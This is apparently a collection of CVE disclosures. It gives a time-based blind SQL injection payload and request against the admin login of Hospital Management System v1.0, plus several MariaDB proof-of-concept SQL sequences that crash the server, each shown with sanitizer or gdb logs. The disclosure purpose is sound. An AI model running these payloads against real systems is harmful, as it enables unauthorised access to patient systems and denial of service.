Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the loginid parameter at adminlogin.php.

The loginid parameter in the adminlogin.php page appears to be vulnerable to SQL injection attacks.

    Parameter: loginid (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: loginid=admin' AND (SELECT 9671 FROM (SELECT(SLEEP(5)))YbRn) AND 'GZcK'='GZcK&password=admin123&submit=Login
    

    POST /hms/adminlogin.php HTTP/1.1
    Host: 192.168.74.136
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 44
    Origin: http://192.168.74.136
    Connection: close
    Referer: http://192.168.74.136/hms/adminlogin.php
    Cookie: PHPSESSID=sbgmgg8q26ri1tmnqfv7poto25
    Upgrade-Insecure-Requests: 1
    
    loginid=admin&password=admin123&submit=Login

CVE-2022-32093: GitHub - Danie1233/Hospital-Management-System-v1.0-SQLi-2

MariaDB v10.2 to v10.7 was discovered to contain a segmentation fault via the component sub_select.

step to reproduce:

CREATE TABLE v0 ( v1 DECIMAL UNIQUE CHECK ( CASE 0 \* 27302337.000000 WHEN 34 THEN + 'x' LIKE 'x' OR v1 NOT IN ( -1 / TRUE ^ 2 ) ELSE 7105743.000000 END ) ) ;

 INSERT INTO v0 VALUES ( 90 ) , ( -1 ) , ( 31152443.000000 ) , ( -32768 ) , ( NULL ) , ( NULL ) ;

 INSERT INTO v0 SELECT AVG ( 'x' ) OVER ( PARTITION BY ( ( NOT AVG ( 76698761.000000 ) ) ) IS NOT NULL ) ;

 INSERT IGNORE INTO v0 ( ) VALUES ( 0 ) , ( 'x' ) , ( 3751286.000000 ) , ( 'x' ) , ( ( v1 = 'x' AND 0 AND 0 ) ) ;

 INSERT INTO v0 VALUES ( 127 ) ;

 INSERT INTO v0 SELECT -2147483648 END FROM v0 AS TEXT JOIN v0 JOIN v0 TABLES ;

 ALTER TABLE v0 ADD ( v2 INT UNIQUE CHECK ( ( v1 = 'x' AND ( ( - ( + ( BINARY 49730460.000000 ) ) ) ) = 'x' BETWEEN 'x' AND 'x' ) ) ) ;

 UPDATE v0 SET v1 = -128 WHERE v1 IS NULL ORDER BY 78 IN ( 'x' , 'x' ) , v1 ;

report (compiled with ASAN):

This could be because you hit a bug. It is also possible that this binary

or one of the libraries it was linked against is corrupt, improperly built,

or misconfigured. This error can also be caused by malfunctioning hardware.

To report this bug, see https://mariadb.com/kb/en/reporting-bugs

We will try our best to scrape up some info that will hopefully help

diagnose the problem, but since we have already crashed, 

something is definitely wrong and this may fail.

Server version: 10.7.0-MariaDB

key\_buffer\_size=134217728

read\_buffer\_size=131072

max\_used\_connections=1

max\_threads=153

thread\_count=1

It is possible that mysqld could use up to 

key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K  bytes of memory

Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack\_bottom = 0x7f4adf25c850 thread\_stack 0x5fc00

sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7f4afeb08c3e\]

mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x55a35785f747\]

sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x55a356827120\]

sigaction.c:0(\_\_restore\_rt)\[0x7f4afe4f2870\]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x629000087238): INSERT INTO v0 SELECT AVG ( 'x' ) OVER ( PARTITION BY ( ( NOT AVG ( 76698761.000000 ) ) ) IS NOT NULL )

Connection ID (thread ID): 4

Status: NOT\_KILLED

Optimizer switch: index\_merge=on,index\_merge\_union=on,index\_merge\_sort\_union=on,index\_merge\_intersection=on,index\_merge\_sort\_intersection=off,engine\_condition\_pushdown=off,index\_condition\_pushdown=on,derived\_merge=on,derived\_with\_keys=on,firstmatch=on,loosescan=on,materialization=on,in\_to\_exists=on,semijoin=on,partial\_match\_rowid\_merge=on,partial\_match\_table\_scan=on,subquery\_cache=on,mrr=off,mrr\_cost\_based=off,mrr\_sort\_keys=off,outer\_join\_with\_cache=on,semijoin\_with\_cache=on,join\_cache\_incremental=on,join\_cache\_hashed=on,join\_cache\_bka=on,optimize\_join\_buffer\_size=on,table\_elimination=on,extended\_keys=on,exists\_to\_in=on,orderby\_uses\_equalities=on,condition\_pushdown\_for\_derived=on,split\_materialized=on,condition\_pushdown\_for\_subquery=on,rowid\_filter=on,condition\_pushdown\_from\_having=on,not\_null\_range\_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains

information that should help you find out what is causing the crash.

Writing a core file...

Working directory at /home/fuboat/mariadb-tmp/3

Resource Limits:

Limit                     Soft Limit           Hard Limit           Units     

Max cpu time              unlimited            unlimited            seconds   

Max file size             unlimited            unlimited            bytes     

Max data size             unlimited            unlimited            bytes     

Max stack size            8388608              unlimited            bytes     

Max core file size        unlimited            unlimited            bytes     

Max resident set          unlimited            unlimited            bytes     

Max processes             61608                61608                processes 

Max open files            524288               524288               files     

Max locked memory         65536                65536                bytes     

Max address space         unlimited            unlimited            bytes     

Max file locks            unlimited            unlimited            locks     

Max pending signals       61608                61608                signals   

Max msgqueue size         819200               819200               bytes     

Max nice priority         0                    0                    

Max realtime priority     0                    0                    

Max realtime timeout      unlimited            unlimited            us        

Core pattern: core

gdb bt:

#0  0x00007f4afe4ef808 in pthread\_kill () from /usr/lib/libpthread.so.0

#1  0x000055a35682706b in handle\_fatal\_signal (sig=<optimized out>) at /experiment/mariadb-server/sql/signal\_handler.cc:344

#2  <signal handler called>

#3  0x0000000000000000 in ?? ()

#4  0x000055a3561b9ee7 in sub\_select (join=0x629000089208, join\_tab=0x629000089c88, end\_of\_records=false) at /experiment/mariadb-server/sql/sql\_select.cc:21052

#5  0x000055a35625eb8d in do\_select (procedure=0x0, join=0x629000089208) at /experiment/mariadb-server/sql/sql\_select.cc:20602

#6  JOIN::exec\_inner (this=0x629000089208) at /experiment/mariadb-server/sql/sql\_select.cc:4735

#7  0x000055a356260593 in JOIN::exec (this=this@entry=0x629000089208) at /experiment/mariadb-server/sql/sql\_select.cc:4513

#8  0x000055a356258b5b in mysql\_select (thd=0x62b0000bd218, tables=<optimized out>, fields=..., conds=<optimized out>, og\_num=0, order=0x0, group=0x0, having=0x0, proc\_param=0x0, select\_options=<optimized out>, result=0x629000089140, unit=0x62b0000c13c0, select\_lex=0x629000087ad0)

    at /experiment/mariadb-server/sql/sql\_select.cc:4991

#9  0x000055a35625a655 in handle\_select (thd=thd@entry=0x62b0000bd218, lex=lex@entry=0x62b0000c12f8, result=result@entry=0x629000089140, setup\_tables\_done\_option=setup\_tables\_done\_option@entry=1073741824) at /experiment/mariadb-server/sql/sql\_select.cc:545

#10 0x000055a3560c99c1 in mysql\_execute\_command (thd=0x62b0000bd218, is\_called\_from\_prepared\_stmt=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:4711

#11 0x000055a3560cc5a1 in mysql\_parse (thd=0x62b0000bd218, rawbuf=<optimized out>, length=<optimized out>, parser\_state=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:8030

#12 0x000055a3560d260c in dispatch\_command (command=<optimized out>, thd=0x62b0000bd218, packet=<optimized out>, packet\_length=<optimized out>, blocking=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:1896

#13 0x000055a3560d773d in do\_command (thd=0x62b0000bd218, blocking=blocking@entry=true) at /experiment/mariadb-server/sql/sql\_parse.cc:1404

#14 0x000055a356492e57 in do\_handle\_one\_connection (connect=<optimized out>, put\_in\_cache=<optimized out>) at /experiment/mariadb-server/sql/sql\_connect.cc:1418

#15 0x000055a35649333d in handle\_one\_connection (arg=arg@entry=0x6080000023b8) at /experiment/mariadb-server/sql/sql\_connect.cc:1312

#16 0x000055a356f23c2c in pfs\_spawn\_thread (arg=0x617000005f18) at /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

#17 0x00007f4afe4e8259 in start\_thread () from /usr/lib/libpthread.so.0

#18 0x00007f4afe0935e3 in clone () from /usr/lib/libc.so.6

CVE-2022-32084: [MDEV-26427] MariaDB Server SEGV issue

MariaDB v10.5 to v10.7 was discovered to contain a segmentation fault via the component st_select_lex_unit::exclude_level.

PoC:

KILL STRCMP ( 'x' = 47051287.000000 , TIME ( NOT 'x' IN ( SELECT -32768 ) ) MOD 44 ) ;

crash log:

Version: '10.7.0-MariaDB' socket: '/tmp/12.socket' port: 10012 Source distribution  
210816 15:00:02 \[ERROR\] mysqld got signal 11 ;  
This could be because you hit a bug. It is also possible that this binary  
or one of the libraries it was linked against is corrupt, improperly built,  
or misconfigured. This error can also be caused by malfunctioning hardware.

To report this bug, see https://mariadb.com/kb/en/reporting-bugs

We will try our best to scrape up some info that will hopefully help  
diagnose the problem, but since we have already crashed,  
something is definitely wrong and this may fail.

Server version: 10.7.0-MariaDB  
key\_buffer\_size=134217728  
read\_buffer\_size=131072  
max\_used\_connections=1  
max\_threads=153  
thread\_count=1  
It is possible that mysqld could use up to  
key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K bytes of memory  
Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218  
Attempting backtrace. You can use the following information to find out  
where mysqld died. If you see no messages after this, something went  
terribly wrong...  
stack\_bottom = 0x7f677d93c850 thread\_stack 0x5fc00  
sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7f679d1e8c3e\]  
mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x55ea78116747\]  
sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x55ea770de120\]  
sigaction.c:0(\_\_restore\_rt)\[0x7f679cbd2870\]  
sql/sql\_lex.cc:3315(st\_select\_lex\_unit::exclude\_level())\[0x55ea768e1518\]  
sql/item\_subselect.cc:322(Item\_subselect::fix\_fields(THD\*, Item\*\*))\[0x55ea773cff8c\]  
sql/item\_subselect.cc:3562(Item\_in\_subselect::fix\_fields(THD\*, Item\*\*))\[0x55ea773d0c62\]  
sql/item\_func.cc:347(Item\_func::fix\_fields(THD\*, Item\*\*))\[0x55ea7727229c\]  
sql/item\_cmpfunc.cc:6455(Item\_func\_not::fix\_fields(THD\*, Item\*\*))\[0x55ea771cd8c2\]  
sql/item\_func.cc:347(Item\_func::fix\_fields(THD\*, Item\*\*))\[0x55ea7727229c\]  
sql/item\_func.cc:347(Item\_func::fix\_fields(THD\*, Item\*\*))\[0x55ea7727229c\]  
sql/item\_func.cc:347(Item\_func::fix\_fields(THD\*, Item\*\*))\[0x55ea7727229c\]  
sql/item.h:1148(Item::fix\_fields\_if\_needed\_for\_scalar(THD\*, Item\*\*))\[0x55ea7698f9d4\]  
sql/sql\_parse.cc:5523(mysql\_execute\_command(THD\*, bool))\[0x55ea76978d5e\]  
sql/sql\_parse.cc:8047(mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*))\[0x55ea769835a1\]  
sql/sql\_parse.cc:1898(dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool))\[0x55ea7698960c\]  
sql/sql\_parse.cc:1406(do\_command(THD\*, bool))\[0x55ea7698e73d\]  
sql/sql\_connect.cc:1418(do\_handle\_one\_connection(CONNECT\*, bool))\[0x55ea76d49e57\]  
sql/sql\_connect.cc:1312(handle\_one\_connection)\[0x55ea76d4a33d\]  
perfschema/pfs.cc:2204(pfs\_spawn\_thread)\[0x55ea777dac2c\]  
pthread\_create.c:0(start\_thread)\[0x7f679cbc8259\]  
:0(\__GI_\_\_clone)\[0x7f679c7735e3\]

Trying to get some variables.  
Some pointers may be invalid and cause the dump to abort.  
Query (0x629000087238): KILL STRCMP ( 'x' = 47051287.000000 , TIME ( NOT 'x' IN ( SELECT -32768 ) ) MOD 44 )

Connection ID (thread ID): 4  
Status: NOT\_KILLED

Optimizer switch: index\_merge=on,index\_merge\_union=on,index\_merge\_sort\_union=on,index\_merge\_intersection=on,index\_merge\_sort\_intersection=off,engine\_condition\_pushdown=off,index\_condition\_pushdown=on,derived\_merge=on,derived\_with\_keys=on,firstmatch=on,loosescan=on,materialization=on,in\_to\_exists=on,semijoin=on,partial\_match\_rowid\_merge=on,partial\_match\_table\_scan=on,subquery\_cache=on,mrr=off,mrr\_cost\_based=off,mrr\_sort\_keys=off,outer\_join\_with\_cache=on,semijoin\_with\_cache=on,join\_cache\_incremental=on,join\_cache\_hashed=on,join\_cache\_bka=on,optimize\_join\_buffer\_size=on,table\_elimination=on,extended\_keys=on,exists\_to\_in=on,orderby\_uses\_equalities=on,condition\_pushdown\_for\_derived=on,split\_materialized=on,condition\_pushdown\_for\_subquery=on,rowid\_filter=on,condition\_pushdown\_from\_having=on,not\_null\_range\_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains  
information that should help you find out what is causing the crash.  
Writing a core file...

CVE-2022-32089: [MDEV-26410] MariaDB server crash in st_select_lex_unit::exclude_level

MariaDB v10.7 was discovered to contain an use-after-poison in in __interceptor_memset at /libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc.

CREATE TABLE v0 ( v2 BIGINT , v1 BIGINT ) ENGINE = MEMORY ROW\_FORMAT = COMPRESSED AS SELECT 59218101.000000 AS v3 UNION SELECT FALSE ;

 START TRANSACTION ;

 SELECT instr ( v1 , DES\_ENCRYPT ( 'x' REGEXP 'x' , 'x' ) ) BETWEEN v3 AND -1 FROM v0 ;

 SELECT DISTINCT v2 IN ( COLLATION ( AVG ( 'x' ) ) + -128 , 'x' , 'x' ) FROM v0 WHERE v2 IS NOT NULL ;

 UPDATE v0 SET v2 = v3 + 69 ;

 INSERT INTO v0 ( ) SELECT v1 , v1 FROM v0 ;

\=================================================================

\==2933067==ERROR: AddressSanitizer: use-after-poison on address 0x6290000a6080 at pc 0x7fb1687ce7b7 bp 0x7fb1435a5730 sp 0x7fb1435a4ed8

WRITE of size 944 at 0x6290000a6080 thread T14

    #0 0x7fb1687ce7b6 in \_\_interceptor\_memset /build/gcc/src/gcc/libsanitizer/sanitizer\_common/sanitizer\_common\_interceptors.inc:799

    #1 0x55c6bfcc41e9 in JOIN::make\_aggr\_tables\_info() /experiment/mariadb-server/sql/sql\_select.cc:3694

    #2 0x55c6bfcf2e71 in JOIN::optimize\_stage2() /experiment/mariadb-server/sql/sql\_select.cc:3225

    #3 0x55c6bfcfcd06 in JOIN::optimize\_inner() /experiment/mariadb-server/sql/sql\_select.cc:2479

    #4 0x55c6bfcfe7b0 in JOIN::optimize() /experiment/mariadb-server/sql/sql\_select.cc:1809

    #5 0x55c6bfcfea0d in mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*) /experiment/mariadb-server/sql/sql\_select.cc:4977

    #6 0x55c6bfd00654 in handle\_select(THD\*, LEX\*, select\_result\*, unsigned long) /experiment/mariadb-server/sql/sql\_select.cc:545

    #7 0x55c6bfb43d7c in execute\_sqlcom\_select /experiment/mariadb-server/sql/sql\_parse.cc:6256

    #8 0x55c6bfb6d420 in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:3946

    #9 0x55c6bfb725a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

    #10 0x55c6bfb7860b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

    #11 0x55c6bfb7d73c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

    #12 0x55c6bff38e56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

    #13 0x55c6bff3933c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

    #14 0x55c6c09c9c2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #15 0x7fb1681ba258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

    #16 0x7fb167d655e2 in \_\_GI\_\_\_clone (/usr/lib/libc.so.6+0xfe5e2)

0x6290000a6080 is located 3712 bytes inside of 16400-byte region \[0x6290000a5200,0x6290000a9210)

allocated by thread T14 here:

    #0 0x7fb16884c279 in \_\_interceptor\_malloc /build/gcc/src/gcc/libsanitizer/asan/asan\_malloc\_linux.cpp:145

    #1 0x55c6c12fc9a8 in my\_malloc /experiment/mariadb-server/mysys/my\_malloc.c:90

    #2 0x55c6c12e9414 in alloc\_root /experiment/mariadb-server/mysys/my\_alloc.c:332

    #3 0x55c6bfc3d047 in Query\_arena::alloc(unsigned long) /experiment/mariadb-server/sql/sql\_class.h:1206

    #4 0x55c6bfc3d047 in update\_ref\_and\_keys /experiment/mariadb-server/sql/sql\_select.cc:7110

    #5 0x55c6bfce537e in make\_join\_statistics /experiment/mariadb-server/sql/sql\_select.cc:5377

    #6 0x55c6bfcfc73b in JOIN::optimize\_inner() /experiment/mariadb-server/sql/sql\_select.cc:2453

    #7 0x55c6bfcfe7b0 in JOIN::optimize() /experiment/mariadb-server/sql/sql\_select.cc:1809

    #8 0x55c6bfcfea0d in mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*) /experiment/mariadb-server/sql/sql\_select.cc:4977

    #9 0x55c6bfd00654 in handle\_select(THD\*, LEX\*, select\_result\*, unsigned long) /experiment/mariadb-server/sql/sql\_select.cc:545

    #10 0x55c6bfb43d7c in execute\_sqlcom\_select /experiment/mariadb-server/sql/sql\_parse.cc:6256

    #11 0x55c6bfb6d420 in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:3946

    #12 0x55c6bfb725a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

    #13 0x55c6bfb7860b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

    #14 0x55c6bfb7d73c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

    #15 0x55c6bff38e56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

    #16 0x55c6bff3933c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

    #17 0x55c6c09c9c2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #18 0x7fb1681ba258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

Thread T14 created by T0 here:

    #0 0x7fb1687edfa7 in \_\_interceptor\_pthread\_create /build/gcc/src/gcc/libsanitizer/asan/asan\_interceptors.cpp:216

    #1 0x55c6c09c9ea9 in my\_thread\_create /experiment/mariadb-server/storage/perfschema/my\_thread.h:48

    #2 0x55c6c09c9ea9 in pfs\_spawn\_thread\_v1 /experiment/mariadb-server/storage/perfschema/pfs.cc:2252

    #3 0x55c6bf83ab3c in inline\_mysql\_thread\_create /experiment/mariadb-server/include/mysql/psi/mysql\_thread.h:1139

    #4 0x55c6bf83ab3c in create\_thread\_to\_handle\_connection(CONNECT\*) /experiment/mariadb-server/sql/mysqld.cc:5934

    #5 0x55c6bf8467b6 in handle\_accepted\_socket(st\_mysql\_socket, st\_mysql\_socket) /experiment/mariadb-server/sql/mysqld.cc:6055

    #6 0x55c6bf84736f in handle\_connections\_sockets() /experiment/mariadb-server/sql/mysqld.cc:6179

    #7 0x55c6bf84aa52 in mysqld\_main(int, char\*\*) /experiment/mariadb-server/sql/mysqld.cc:5829

    #8 0x7fb167c8eb24 in \_\_libc\_start\_main (/usr/lib/libc.so.6+0x27b24)

SUMMARY: AddressSanitizer: use-after-poison /build/gcc/src/gcc/libsanitizer/sanitizer\_common/sanitizer\_common\_interceptors.inc:799 in \_\_interceptor\_memset

Shadow bytes around the buggy address:

  0x0c528000cbc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cbd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cbe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cbf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cc00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

\=>0x0c528000cc10:\[f7\]00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cc20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cc30: 00 00 00 00 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c528000cc40: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c528000cc50: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c528000cc60: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

Shadow byte legend (one shadow byte represents 8 application bytes):

  Addressable:           00

  Partially addressable: 01 02 03 04 05 06 07 

  Heap left redzone:       fa

  Freed heap region:       fd

  Stack left redzone:      f1

  Stack mid redzone:       f2

  Stack right redzone:     f3

  Stack after return:      f5

  Stack use after scope:   f8

  Global redzone:          f9

  Global init order:       f6

  Poisoned by user:        f7

  Container overflow:      fc

  Array cookie:            ac

  Intra object redzone:    bb

  ASan internal:           fe

  Left alloca redzone:     ca

  Right alloca redzone:    cb

  Shadow gap:              cc

\==2933067==ABORTING

CVE-2022-32091: [MDEV-26431] MariaDB Server use-after-poison - Jira

MariaDB v10.4 to v10.7 was discovered to contain an use-after-poison in prepare_inplace_add_virtual at /storage/innobase/handler/handler0alter.cc.

CREATE TABLE v0 ( v1 TIME NOT NULL PRIMARY KEY ) ;

 ALTER TABLE v0 ADD COLUMN v0 INT GENERATED ALWAYS AS ( lpad ( 'x' , NULL = 32 , 'x' ) ) STORED ;

 SHOW LOCAL STATUS WHERE COALESCE ( 27 , 51 - 39 ) = 'x' ;

 DELETE FROM v0 WHERE 44707452.000000 ;

 ALTER TABLE v0 ADD COLUMN v0 INT GENERATED ALWAYS AS ( v1 + v1 ) , DROP COLUMN v0 ;

 SELECT COUNT ( \* ) FROM v0 WHERE v1 = -128 AND v1 = 'x' ;

2021-08-16 14:41:38 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 14:41:38 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 14:41:38 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using liburing

2021-08-16 14:41:38 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 14:41:38 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 14:41:38 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 14:41:38 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 14:41:38 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 14:41:38 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42161; transaction id 14

2021-08-16 14:41:38 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:38 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 14:41:38

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 14:41:38 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/0.socket'  port: 3306  Source distribution

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld (initiated by: root\[root\] @ localhost \[\]): Normal shutdown

2021-08-16 14:41:39 0 \[Note\] InnoDB: FTS optimize thread exiting.

2021-08-16 14:41:39 0 \[Note\] InnoDB: Starting shutdown...

2021-08-16 14:41:39 0 \[Note\] InnoDB: Dumping buffer pool(s) to /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:39 0 \[Note\] InnoDB: Buffer pool(s) dump completed at 210816 14:41:39

2021-08-16 14:41:39 0 \[Note\] InnoDB: Removed temporary tablespace data file: "./ibtmp1"

2021-08-16 14:41:39 0 \[Note\] InnoDB: Shutdown completed; log sequence number 42173; transaction id 15

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld: Shutdown complete

2021-08-16 14:49:19 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 14:49:19 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 14:49:19 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 14:49:19 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 14:49:19 0 \[Note\] InnoDB: Using liburing

2021-08-16 14:49:19 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 14:49:19 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 14:49:26 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 14:49:26 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 14:49:26 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 14:49:26 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 14:49:26 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42173; transaction id 14

2021-08-16 14:49:26 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/19/ib\_buffer\_pool

2021-08-16 14:49:26 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 14:49:27 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 14:49:27 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 14:49:28 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 14:49:28

2021-08-16 14:49:28 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/19.socket'  port: 10019  Source distribution

\=================================================================

\==2119277==ERROR: AddressSanitizer: use-after-poison on address 0x6190000d6d60 at pc 0x55a3184baacf bp 0x7f47ed829920 sp 0x7f47ed829910

WRITE of size 64 at 0x6190000d6d60 thread T14

    #0 0x55a3184baace in prepare\_inplace\_add\_virtual /experiment/mariadb-server/sql/field.h:1395

    #1 0x55a3184cc1db in prepare\_inplace\_alter\_table\_dict /experiment/mariadb-server/storage/innobase/handler/handler0alter.cc:6206

    #2 0x55a3184d9f06 in ha\_innobase::prepare\_inplace\_alter\_table(TABLE\*, Alter\_inplace\_info\*) /experiment/mariadb-server/storage/innobase/handler/handler0alter.cc:8270

    #3 0x55a3176a67d2 in mysql\_inplace\_alter\_table /experiment/mariadb-server/sql/sql\_table.cc:7326

    #4 0x55a3176a67d2 in mysql\_alter\_table(THD\*, st\_mysql\_const\_lex\_string const\*, st\_mysql\_const\_lex\_string const\*, HA\_CREATE\_INFO\*, TABLE\_LIST\*, Alter\_info\*, unsigned int, st\_order\*, bool, bool) /experiment/mariadb-server/sql/sql\_table.cc:10205

    #5 0x55a3177fcf99 in Sql\_cmd\_alter\_table::execute(THD\*) /experiment/mariadb-server/sql/sql\_alter.cc:550

    #6 0x55a31741717f in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:5997

    #7 0x55a3174245a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

    #8 0x55a31742a60b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

    #9 0x55a31742f73c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

    #10 0x55a3177eae56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

    #11 0x55a3177eb33c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

    #12 0x55a31827bc2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #13 0x7f4812443258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

    #14 0x7f4811fee5e2 in \_\_GI\_\_\_clone (/usr/lib/libc.so.6+0xfe5e2)

